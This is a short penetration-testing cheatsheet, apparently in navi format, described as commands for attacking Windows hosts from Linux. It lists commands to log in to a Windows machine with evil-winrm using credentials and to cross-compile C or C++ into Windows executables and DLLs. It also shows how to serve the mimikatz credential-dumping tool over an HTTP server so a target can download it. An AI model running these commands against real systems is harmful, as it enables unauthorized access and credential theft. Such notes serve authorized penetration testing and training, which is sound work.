% linux, windows, sh, enum
; this cheatsheet contains commands to be used in linux for the purpose of attacking windows hosts

# connect to windows machine via WinRM (with username & password)
evil-winrm -i <host_address> -u <username> -p <password>

# compile c code to 64-bit windows executable
x86_64-w64-mingw32-gcc <input_c_filename> -o <output_exe_filename>

# compile c++ code to windows dll
x86_64-w64-mingw32-gcc <input_cpp_filename> --shared -o <output_dll_filename>

# start hosting mimikatz at port 80
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
sudo python3 -m http.server 80

# start hosting mimikatz at non-sudo port
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
python3 -m http.server <port>